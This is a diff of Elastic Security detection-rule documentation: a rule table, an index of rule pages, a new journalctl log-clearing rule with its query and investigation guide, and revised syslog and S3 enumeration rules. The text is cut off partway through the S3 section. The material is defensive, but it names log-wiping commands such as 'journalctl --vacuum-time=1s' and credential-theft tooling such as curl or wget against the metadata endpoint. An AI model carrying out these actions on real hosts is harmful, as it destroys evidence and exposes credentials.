PowerShell with suspicious argument values. This behavior is often observed during malware installation leveraging PowerShell. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Windows Security Event Logs], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Microsoft Defender for Endpoint], [Data Source: Crowdstrike], [Data Source: Elastic Endgame], [Resources: Investigation Guide] |None |209 |<> |A suspicious Zoom child process was detected, which may indicate an attempt to run unnoticed. Verify process details such as command line, network connections, file writes and associated file signature details as well. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend], [Data Source: SentinelOne], [Data Source: Microsoft Defender for Endpoint], [Data Source: Windows Security Event Logs], [Data Source: Crowdstrike], [Data Source: Sysmon] |None |420 @@ -2732,7 +2760,7 @@ and their rule type is `machine_learning`. |<> |This rule detects unusual file creations from a web server parent process. Adversaries may attempt to create files from a web server parent process to establish persistence, execute malicious scripts, or exfiltrate data. ES|QL rules have limited fields available in its alert documents. Make sure to review the original documents to aid in the investigation of this alert. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Execution], [Tactic: Command and Control], [Data Source: Elastic Defend], [Rule Type: BBR] |None |4 -|<> |Identifies an unexpected file being modified by dns.exe, the process responsible for Windows DNS Server services, which may indicate activity related to remote code execution or other forms of exploitation. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Endgame], [Use Case: Vulnerability], [Data Source: Elastic Defend], [Data Source: Sysmon] |None |215 +|<> |Identifies an unexpected file being modified by dns.exe, the process responsible for Windows DNS Server services, which may indicate activity related to remote code execution or other forms of exploitation. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Endgame], [Use Case: Vulnerability], [Data Source: Elastic Defend], [Data Source: Sysmon], [Resources: Investigation Guide] |None |216 |<> |This rule leverages ESQL to detect the execution of unusual file transfer utilities on Linux systems. Attackers may use these utilities to exfiltrate data from a compromised system. ESQL rules have limited fields available in its alert documents. Make sure to review the original documents to aid in the investigation of this alert. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Exfiltration], [Tactic: Execution], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |6 @@ -2752,7 +2780,7 @@ and their rule type is `machine_learning`. |<> |A machine learning job detected a user logging in at a time of day that is unusual for the user. This can be due to credentialed access via a compromised account when the user and the threat actor are in different time zones. In addition, unauthorized user activity often takes place during non-business hours. |[Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Initial Access], [Resources: Investigation Guide] |None |107 -|<> |This rule identifies potentially malicious processes attempting to access the cloud service provider's instance metadata service (IMDS) API endpoint, which can be used to retrieve sensitive instance-specific information such as instance ID, public IP address, and even temporary security credentials if role's are assumed by that instance. The rule monitors for various tools and scripts like curl, wget, python, and perl that might be used to interact with the metadata API. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access], [Tactic: Discovery], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |6 +|<> |This rule identifies potentially malicious processes attempting to access the cloud service provider's instance metadata service (IMDS) API endpoint, which can be used to retrieve sensitive instance-specific information such as instance ID, public IP address, and even temporary security credentials if role's are assumed by that instance. The rule monitors for various tools and scripts like curl, wget, python, and perl that might be used to interact with the metadata API. |[Domain: Endpoint], [Domain: Cloud], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access], [Tactic: Discovery], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |7 |<> |This rule detects when an unusual interactive process is launched inside a container. Interactive processes are typically run in the foreground and require user input, which is unusual behavior for a containerized environment. This activity could indicate an attacker attempting to gain access to the container environment or perform malicious actions. |[Domain: Container], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |2 @@ -2842,7 +2870,7 @@ and their rule type is `machine_learning`. |<> |A machine learning job has identified a user performing privileged operations in Windows from an uncommon geographical location, indicating potential privileged access activity. This could suggest a compromised account, unauthorized access, or an attacker using stolen credentials to escalate privileges. |[Use Case: Privileged Access Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Privilege Escalation], [Resources: Investigation Guide] |None |3 -|<> |This rule leverages the new_terms rule type to detect file creation via a commonly used file transfer service while excluding typical remote file creation activity. This behavior is often linked to lateral movement, potentially indicating an attacker attempting to move within a network. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |3 +|<> |This rule leverages the new_terms rule type to detect file creation via a commonly used file transfer service while excluding typical remote file creation activity. This behavior is often linked to lateral movement, potentially indicating an attacker attempting to move within a network. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |4 |<> |An anomaly detection job has detected a remote file transfer on an unusual directory indicating a potential lateral movement activity on the host. Many Security solutions monitor well-known directories for suspicious activities, so attackers might use less common directories to bypass monitoring. |[Use Case: Lateral Movement Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Lateral Movement], [Resources: Investigation Guide] |None |7 @@ -2894,9 +2922,9 @@ and their rule type is `machine_learning`. |<> |Identifies attempts to create new users. This is sometimes done by attackers to increase access or establish persistence on a system or domain. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Windows Security Event Logs], [Data Source: Microsoft Defender for Endpoint], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Crowdstrike] |None |314 -|<> |Identifies when a user is added as an owner for an Azure application. An adversary may add a user account as an owner for an Azure application in order to grant additional permissions and modify the application's configuration using another account. |[Domain: Cloud], [Data Source: Azure], [Use Case: Configuration Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |105 +|<> |Identifies when a user is added as an owner for an Azure application. An adversary may add a user account as an owner for an Azure application in order to grant additional permissions and modify the application's configuration using another account. |[Domain: Cloud], [Data Source: Azure], [Use Case: Configuration Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |106 -|<> |Identifies when a user is added as an owner for an Azure service principal. The service principal object defines what the application can do in the specific tenant, who can access the application, and what resources the app can access. A service principal object is created when an application is given permission to access resources in a tenant. An adversary may add a user account as an owner for a service principal and use that account in order to define what an application can do in the Azure AD tenant. |[Domain: Cloud], [Data Source: Azure], [Use Case: Configuration Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |105 +|<> |Identifies when a user is added as an owner for an Azure service principal. The service principal object defines what the application can do in the specific tenant, who can access the application, and what resources the app can access. A service principal object is created when an application is given permission to access resources in a tenant. An adversary may add a user account as an owner for a service principal and use that account in order to define what an application can do in the Azure AD tenant. |[Domain: Cloud], [Data Source: Azure], [Use Case: Configuration Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |106 |<> |Identifies a user being added to a privileged group in Active Directory. Privileged accounts and groups in Active Directory are those to which powerful rights, privileges, and permissions are granted that allow them to perform nearly any action in Active Directory and on domain-joined systems. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Resources: Investigation Guide], [Use Case: Active Directory Monitoring], [Data Source: Active Directory], [Data Source: Windows Security Event Logs] |None |215 diff --git a/docs/detections/prebuilt-rules/rule-desc-index.asciidoc b/docs/detections/prebuilt-rules/rule-desc-index.asciidoc index deeeefbc8b..f4448394c1 100644 --- a/docs/detections/prebuilt-rules/rule-desc-index.asciidoc +++ b/docs/detections/prebuilt-rules/rule-desc-index.asciidoc @@ -159,6 +159,7 @@ include::rule-details/archive-file-with-unusual-extension.asciidoc[] include::rule-details/at-job-created-or-modified.asciidoc[] include::rule-details/at-exe-command-lateral-movement.asciidoc[] include::rule-details/attempt-to-clear-kernel-ring-buffer.asciidoc[] +include::rule-details/attempt-to-clear-logs-via-journalctl.asciidoc[] include::rule-details/attempt-to-create-okta-api-token.asciidoc[] include::rule-details/attempt-to-deactivate-an-okta-application.asciidoc[] include::rule-details/attempt-to-deactivate-an-okta-network-zone.asciidoc[] @@ -189,7 +190,6 @@ include::rule-details/attempted-private-key-access.asciidoc[] include::rule-details/attempts-to-brute-force-an-okta-user-account.asciidoc[] include::rule-details/authentication-via-unusual-pam-grantor.asciidoc[] include::rule-details/authorization-plugin-modification.asciidoc[] -include::rule-details/azure-ad-global-administrator-role-assigned.asciidoc[] include::rule-details/azure-active-directory-high-risk-user-sign-in-heuristic.asciidoc[] include::rule-details/azure-active-directory-powershell-sign-in.asciidoc[] include::rule-details/azure-alert-suppression-rule-created-or-modified.asciidoc[] @@ -218,8 +218,11 @@ include::rule-details/azure-kubernetes-rolebindings-created.asciidoc[] include::rule-details/azure-network-watcher-deletion.asciidoc[] include::rule-details/azure-openai-insecure-output-handling.asciidoc[] include::rule-details/azure-privilege-identity-management-role-modified.asciidoc[] +include::rule-details/azure-rbac-built-in-administrator-roles-assigned.asciidoc[] include::rule-details/azure-resource-group-deletion.asciidoc[] +include::rule-details/azure-storage-account-blob-public-access-enabled.asciidoc[] include::rule-details/azure-storage-account-key-regenerated.asciidoc[] +include::rule-details/azure-storage-account-keys-accessed-by-privileged-user.asciidoc[] include::rule-details/bpf-filter-applied-using-tc.asciidoc[] include::rule-details/backup-deletion-with-wbadmin.asciidoc[] include::rule-details/base16-or-base32-encoding-decoding-activity.asciidoc[] @@ -270,6 +273,7 @@ include::rule-details/creation-or-modification-of-domain-backup-dpapi-private-ke include::rule-details/creation-or-modification-of-pluggable-authentication-module-or-configuration.asciidoc[] include::rule-details/creation-or-modification-of-root-certificate.asciidoc[] include::rule-details/creation-or-modification-of-a-new-gpo-scheduled-task-or-service.asciidoc[] +include::rule-details/credential-access-via-trufflehog-execution.asciidoc[] include::rule-details/credential-acquisition-via-registry-hive-dumping.asciidoc[] include::rule-details/credential-dumping-detected-elastic-endgame.asciidoc[] include::rule-details/credential-dumping-prevented-elastic-endgame.asciidoc[] @@ -279,6 +283,7 @@ include::rule-details/cron-job-created-or-modified.asciidoc[] include::rule-details/crowdstrike-external-alerts.asciidoc[] include::rule-details/cupsd-or-foomatic-rip-shell-execution.asciidoc[] include::rule-details/curl-socks-proxy-activity-from-unusual-parent.asciidoc[] +include::rule-details/curl-or-wget-spawned-via-node-js.asciidoc[] include::rule-details/cyberark-privileged-access-security-error.asciidoc[] include::rule-details/cyberark-privileged-access-security-recommended-monitor.asciidoc[] include::rule-details/d-bus-service-created.asciidoc[] @@ -327,7 +332,9 @@ include::rule-details/enable-host-network-discovery-via-netsh.asciidoc[] include::rule-details/encoded-executable-stored-in-the-registry.asciidoc[] include::rule-details/encrypting-files-with-winrar-or-7z.asciidoc[] include::rule-details/endpoint-security-elastic-defend.asciidoc[] +include::rule-details/entra-id-actor-token-user-impersonation-abuse.asciidoc[] include::rule-details/entra-id-device-code-auth-with-broker-client.asciidoc[] +include::rule-details/entra-id-global-administrator-role-assigned.asciidoc[] include::rule-details/entra-id-mfa-disabled-for-user.asciidoc[] include::rule-details/entra-id-protection-risk-detection-sign-in-risk.asciidoc[] include::rule-details/entra-id-protection-risk-detection-user-risk.asciidoc[] @@ -443,6 +450,7 @@ include::rule-details/git-hook-created-or-modified.asciidoc[] include::rule-details/git-hook-egress-network-connection.asciidoc[] include::rule-details/git-repository-or-file-download-to-suspicious-directory.asciidoc[] include::rule-details/github-app-deleted.asciidoc[] +include::rule-details/github-authentication-token-access-via-node-js.asciidoc[] include::rule-details/github-owner-role-granted-to-user.asciidoc[] include::rule-details/github-pat-access-revoked.asciidoc[] include::rule-details/github-protected-branch-settings-changed.asciidoc[] @@ -637,6 +645,7 @@ include::rule-details/microsoft-entra-id-illicit-consent-grant-via-registered-ap include::rule-details/microsoft-entra-id-mfa-totp-brute-force-attempts.asciidoc[] include::rule-details/microsoft-entra-id-oauth-phishing-via-visual-studio-code-client.asciidoc[] include::rule-details/microsoft-entra-id-protection-risk-detections.asciidoc[] +include::rule-details/microsoft-entra-id-protection-alert-and-device-registration.asciidoc[] include::rule-details/microsoft-entra-id-rare-authentication-requirement-for-principal-user.asciidoc[] include::rule-details/microsoft-entra-id-service-principal-created.asciidoc[] include::rule-details/microsoft-entra-id-service-principal-credentials-added-by-rare-user.asciidoc[] @@ -718,6 +727,7 @@ include::rule-details/new-okta-authentication-behavior-detected.asciidoc[] include::rule-details/new-okta-identity-provider-idp-added-by-admin.asciidoc[] include::rule-details/new-user-added-to-github-organization.asciidoc[] include::rule-details/new-or-modified-federation-domain.asciidoc[] +include::rule-details/node-js-pre-or-post-install-script-execution.asciidoc[] include::rule-details/nping-process-activity.asciidoc[] include::rule-details/nullsessionpipe-registry-modification.asciidoc[] include::rule-details/o365-email-reported-by-user-as-malware-or-phish.asciidoc[] @@ -776,7 +786,10 @@ include::rule-details/potential-application-shimming-via-sdbinst.asciidoc[] include::rule-details/potential-azure-openai-model-theft.asciidoc[] include::rule-details/potential-backdoor-execution-through-pam-exec.asciidoc[] include::rule-details/potential-buffer-overflow-attack-detected.asciidoc[] +include::rule-details/potential-cve-2025-32463-nsswitch-file-creation.asciidoc[] +include::rule-details/potential-cve-2025-32463-sudo-chroot-execution-attempt.asciidoc[] include::rule-details/potential-cve-2025-33053-exploitation.asciidoc[] +include::rule-details/potential-cve-2025-41244-vmtoolsd-lpe-exploitation-attempt.asciidoc[] include::rule-details/potential-chroot-container-escape-via-mount.asciidoc[] include::rule-details/potential-code-execution-via-postgresql.asciidoc[] include::rule-details/potential-command-and-control-via-internet-explorer.asciidoc[] @@ -916,7 +929,7 @@ include::rule-details/potential-protocol-tunneling-via-chisel-server.asciidoc[] include::rule-details/potential-protocol-tunneling-via-earthworm.asciidoc[] include::rule-details/potential-pspy-process-monitoring-detected.asciidoc[] include::rule-details/potential-remcos-trojan-execution.asciidoc[] -include::rule-details/potential-ransomware-behavior-high-count-of-readme-files-by-system.asciidoc[] +include::rule-details/potential-ransomware-behavior-note-files-by-system.asciidoc[] include::rule-details/potential-ransomware-note-file-dropped-via-smb.asciidoc[] include::rule-details/potential-remote-code-execution-via-web-server.asciidoc[] include::rule-details/potential-remote-credential-access-via-registry.asciidoc[] @@ -1255,6 +1268,7 @@ include::rule-details/suspicious-renaming-of-esxi-files.asciidoc[] include::rule-details/suspicious-renaming-of-esxi-index-html-file.asciidoc[] include::rule-details/suspicious-screenconnect-client-child-process.asciidoc[] include::rule-details/suspicious-script-object-execution.asciidoc[] +include::rule-details/suspicious-seincreasebasepriorityprivilege-use.asciidoc[] include::rule-details/suspicious-service-was-installed-in-the-system.asciidoc[] include::rule-details/suspicious-solarwinds-child-process.asciidoc[] include::rule-details/suspicious-startup-shell-folder-modification.asciidoc[] diff --git a/docs/detections/prebuilt-rules/rule-details/attempt-to-clear-logs-via-journalctl.asciidoc b/docs/detections/prebuilt-rules/rule-details/attempt-to-clear-logs-via-journalctl.asciidoc new file mode 100644 index 0000000000..cec563cc8a --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/attempt-to-clear-logs-via-journalctl.asciidoc @@ -0,0 +1,165 @@ +[[attempt-to-clear-logs-via-journalctl]] +=== Attempt to Clear Logs via Journalctl + +This rule monitors for attempts to clear logs using the "journalctl" command on Linux systems. Adversaries may use this technique to cover their tracks by deleting or truncating log files, making it harder for defenders to investigate their activities. The rule looks for the execution of "journalctl" with arguments that indicate log clearing actions, such as "--vacuum-time", "--vacuum-size", or "--vacuum-files". + +*Rule type*: eql + +*Rule indices*: + +* auditbeat-* +* endgame-* +* logs-auditd_manager.auditd-* +* logs-crowdstrike.fdr* +* logs-endpoint.events.process* +* logs-sentinel_one_cloud_funnel.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Defend +* Data Source: Elastic Endgame +* Data Source: Auditd Manager +* Data Source: Crowdstrike +* Data Source: SentinelOne +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Attempt to Clear Logs via Journalctl* + + +This detection flags attempts to purge systemd journal logs by invoking journalctl with vacuum options, which attackers use to erase evidence and impede investigations. A common pattern is a compromised user escalating to root and immediately running sudo journalctl --vacuum-time=1s or --vacuum-size=1M, sometimes via a script or cron job, to rapidly truncate the journal across all boots and hide prior execution traces. + + +*Possible investigation steps* + + +- Enrich with user/UID, effective privileges, parent and command-line, session/TTY, and origin (SSH IP or local), and determine if execution came from a scheduled job (cron/systemd timer) or a script. +- Quantify destructiveness by extracting the exact vacuum parameter value(s) and immediately checking journal state (journalctl --disk-usage and --list-boots) and /var/log/journal size/mtime to see how much history was removed. +- Inspect configuration and persistence paths for intentional log suppression, including recent changes in /etc/systemd/journald.conf (Storage=volatile, SystemMaxUse, SystemMaxFileSize, MaxRetentionSec) and any new systemd units or scripts invoking journalctl vacuum. +- Correlate the vacuum timestamp with preceding activity to identify what might be concealed (privilege escalation, new accounts, sudoers edits, suspicious binaries), using auditd/EDR telemetry and shell history to rebuild the timeline. +- Verify remote log forwarding and SIEM ingestion for this host, compare gaps around the vacuum time, and recover pre-vacuum events from central storage to assess impact and intent. + + +*False positive analysis* + + +- A sysadmin or maintenance script ran journalctl --vacuum-time or --vacuum-size to reclaim space on a host under log disk pressure, which should correlate with low-free-space alerts, approved retention policy, and a scheduled systemd timer or cron job. +- OS provisioning or image-preparation steps vacuumed the journal with journalctl --vacuum-files to sanitize logs before snapshotting, typically a one-time root action occurring near installation and matching documented build procedures. + + +*Response and remediation* + + +- Immediately kill any active journalctl vacuum invocation (e.g., pkill -x journalctl), lock or remove sudo for the initiating user, and network-quarantine the host to prevent further tampering. +- Remove persistence by disabling systemd units/timers and cron jobs that call "journalctl --vacuum-*", inspecting /etc/systemd/system/* for ExecStart=journalctl vacuum and /etc/crontab, /etc/cron.*, and user crontabs, then deleting the offending scripts. +- Recover logging by setting Storage=persistent and policy-compliant SystemMaxUse/SystemMaxFileSize/MaxRetentionSec in /etc/systemd/journald.conf, restarting systemd-journald, and backfilling missing events from central log archives. +- Harden by enabling remote forwarding (ForwardToSyslog=yes and rsyslog/syslog-ng to SIEM), adding auditd rules to alert on "journalctl --vacuum-*", and tightening sudoers to require MFA and record command I/O for journalctl on critical hosts. +- Preserve evidence by archiving remaining /var/log/journal entries, journald.conf and its mtime, modified unit files under /etc/systemd/system, and shell/auth logs, and capture a disk snapshot before making further changes. +- Escalate to incident response if root executed "journalctl --vacuum-time/size/files" outside a documented maintenance window, if Storage=volatile was set or retention reduced below policy, or if the same actor performed vacuums on multiple hosts within 24 hours. + + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and +event.action in ("exec", "exec_event", "start", "ProcessRollup2", "executed", "process_started") and +process.name == "journalctl" and process.args like ("--vacuum-time=*", "--vacuum-size=*", "--vacuum-files=*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Indicator Removal +** ID: T1070 +** Reference URL: https://attack.mitre.org/techniques/T1070/ +* Sub-technique: +** Name: Clear Linux or Mac System Logs +** ID: T1070.002 +** Reference URL: https://attack.mitre.org/techniques/T1070/002/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/attempt-to-disable-syslog-service.asciidoc b/docs/detections/prebuilt-rules/rule-details/attempt-to-disable-syslog-service.asciidoc index c414f723a4..6b160fb4d0 100644 --- a/docs/detections/prebuilt-rules/rule-details/attempt-to-disable-syslog-service.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/attempt-to-disable-syslog-service.asciidoc @@ -39,7 +39,7 @@ Adversaries may attempt to disable the syslog service in an attempt to an attemp * Data Source: SentinelOne * Resources: Investigation Guide -*Version*: 214 +*Version*: 215 *Rule authors*: @@ -159,7 +159,10 @@ process where host.os.type == "linux" and event.action in ("exec", "exec_event", (process.name == "chkconfig" and process.args == "off") or (process.name == "systemctl" and process.args in ("disable", "stop", "kill")) ) and process.args in ("syslog", "rsyslog", "syslog-ng", "syslog.service", "rsyslog.service", "syslog-ng.service") and -not process.parent.name == "rsyslog-rotate" +not ( + process.parent.name == "rsyslog-rotate" or + process.args == "HUP" +) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/aws-s3-bucket-enumeration-or-brute-force.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-s3-bucket-enumeration-or-brute-force.asciidoc index ab98c16c40..44aa3e2bab 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-s3-bucket-enumeration-or-brute-force.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-s3-bucket-enumeration-or-brute-force.asciidoc @@ -1,11 +1,13 @@ [[aws-s3-bucket-enumeration-or-brute-force]] === AWS S3 Bucket Enumeration or Brute Force -Identifies a high number of failed S3 operations from a single source and account (or anonymous account) within a short timeframe. This activity can be indicative of attempting to cause an increase in billing to an account for excessive random operations, cause resource exhaustion, or enumerating bucket names for discovery. +Identifies a high number of failed S3 operations against a single bucket from a single source address within a short timeframe. This activity can indicate attempts to collect bucket objects or cause an increase in billing to an account via internal "AccessDenied" errors. -*Rule type*: esql +*Rule type*: threshold -*Rule indices*: None +*Rule indices*: + +* logs-aws.cloudtrail-* *Severity*: low @@ -20,7 +22,7 @@ Identifies a high number of failed S3 operations from a single source and accoun *References*: * https://medium.com/@maciej.pocwierz/how-an-empty-s3-bucket-can-make-your-aws-bill-explode-934a383cb8b1 -* https://docs.aws.amazon.com/cli/latest/reference/s3api/ +* https://docs.aws.amazon.com/AmazonS3/latest/userguide/ErrorCodeBilling.html *Tags*: @@ -31,8 +33,10 @@ Identifies a high number of failed S3 operations from a single source and accoun * Resources: Investigation Guide * Use Case: Log Auditing * Tactic: Impact +* Tactic: Discovery +* Tactic: Collection -*Version*: 5 +*Version*: 6 *Rule authors*: @@ -48,61 +52,64 @@ Identifies a high number of failed S3 operations from a single source and accoun *Triage and analysis* +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. -*Investigating AWS S3 Bucket Enumeration or Brute Force* +*Investigating AWS S3 Bucket Enumeration or Brute Force* -AWS S3 buckets can be be brute forced to cause financial impact against the resource owner. What makes this even riskier is that even private, locked down buckets can still trigger a potential cost, even with an "Access Denied", while also being accessible from unauthenticated, anonymous accounts. This also appears to work on several or all https://docs.aws.amazon.com/cli/latest/reference/s3api/[operations] (GET, PUT, list-objects, etc.). Additionally, buckets are trivially discoverable by default as long as the bucket name is known, making it vulnerable to enumeration for discovery. -Attackers may attempt to enumerate names until a valid bucket is discovered and then pivot to cause financial impact, enumerate for more information, or brute force in other ways to attempt to exfil data. +This rule detects when many failed S3 operations (HTTP 403 AccessDenied) hit a single bucket from a single source address in a short window. This can indicate bucket name enumeration, object/key guessing, or brute-force style traffic intended to drive cost or probe for misconfigurations. 403 requests from outside the bucket owner’s account/organization are not billed, but 4XX from inside the owner’s account/org can still incur charges. Prioritize confirming who is making the calls and where they originate. *Possible investigation steps* -- Examine the history of the operation requests from the same `source.address` and `cloud.account.id` to determine if there is other suspicious activity. -- Review similar requests and look at the `user.agent` info to ascertain the source of the requests (though do not overly rely on this since it is controlled by the requestor). -- Review other requests to the same `aws.s3.object.key` as well as other `aws.s3.object.key` accessed by the same `cloud.account.id` or `source.address`. -- Investigate other alerts associated with the user account during the past 48 hours. -- Validate the activity is not related to planned patches, updates, or network administrator activity. -- Examine the request parameters. These may indicate the source of the program or the nature of the task being performed when the error occurred. - - Check whether the error is related to unsuccessful attempts to enumerate or access objects, data, or secrets. -- Considering the source IP address and geolocation of the user who issued the command: - - Do they look normal for the calling user? - - If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts or is the source IP from an EC2 instance that's not under your control? - - If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles? Are there any other alerts or signs of suspicious activity involving this instance? -- Consider the time of day. If the user is a human (not a program or script), did the activity take place during a normal time of day? -- Contact the account owner and confirm whether they are aware of this activity if suspicious. -- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services, and data accessed by the account in the last 24 hours. +- **Investigate in Timeline.** Investigate the alert in timeline (Take action -> Investigate in timeline) to retrieve and review all of the raw CloudTrail events that contributed to the threshold alert. Threshold alerts only display the grouped fields; Timeline provides a way to see individual event details such as request parameters, full error messages, and additional user context. +- **Confirm entity & target.** Note the rule’s threshold and window. Identify the target bucket (`tls.client.server_name`) and the source (`source.address`). Verify the caller identity details via any available `aws.cloudtrail.user_identity` fields. +- **Actor & session context.** In CloudTrail events, pivot 15–30 minutes around the spike for the same `source.address` or principal. Determine if the source is: + - **External** to your account/organization (recon/cost DDoS risk is lower for you due to 2024 billing change). + - **Internal** (same account/org)—higher cost risk and possible misuse of internal automation. +- **Bucket posture snapshot.** Record S3 Block Public Access, Bucket Policy, ACLs, and whether Versioning/Object Lock are enabled. Capture any recent `PutBucketPolicy`, `PutPublicAccessBlock`, `PutBucketVersioning`, or lifecycle changes. +- **Blast radius.** Check for similar spikes to other buckets/regions, or parallel spikes from the same source. Review any GuardDuty S3 findings and AWS Config drift related to the bucket or principal. +- **Business context.** Contact the bucket/app owner. Validate whether a migration, scanner, or broken job could legitimately cause bursts. *False positive analysis* -- Verify the `source.address` and `cloud.account.id` - there are some valid operations from within AWS directly that can cause failures and false positives. Additionally, failed automation can also caeuse false positives, but should be identifiable by reviewing the `source.address` and `cloud.account.id`. +- **Expected jobs / broken automation.** Data movers, posture scanners, or failed credentials can generate 403 storms. Validate with `userAgent`, ARNs, change windows, and environment (dev/stage vs prod). +- **External probing.** Internet-origin enumeration often looks like uniform 403s from transient or cloud-provider IPs and typically has no business impact and no billing if outside your account/org. Tune thresholds or allowlist known scanners if appropriate. *Response and remediation* -- Initiate the incident response process based on the outcome of the triage. -- Disable or limit the account during the investigation and response. -- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context: - - Identify the account role in the cloud environment. - - Assess the criticality of affected services and servers. - - Work with your IT team to identify and minimize the impact on users. - - Identify if the attacker is moving laterally and compromising other accounts, servers, or services. - - Identify any regulatory or legal ramifications related to this activity. -- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions. -- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users. -- Consider enabling multi-factor authentication for users. -- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed. -- Implement security best practices https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/[outlined] by AWS. -- Take the actions needed to return affected systems, data, or services to their normal operational levels. -- Identify the initial vector abused by the attacker and take action to prevent reinfection via the same vector. -- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). -- Check for PutBucketPolicy event actions as well to see if they have been tampered with. While we monitor for denied, a single successful action to add a backdoor into the bucket via policy updates (however they got permissions) may be critical to identify during TDIR. +**1. Immediate, low-risk actions** +- **Preserve evidence.** Export CloudTrail records (±30 minutes) for the bucket and source address into an evidence bucket with restricted access. 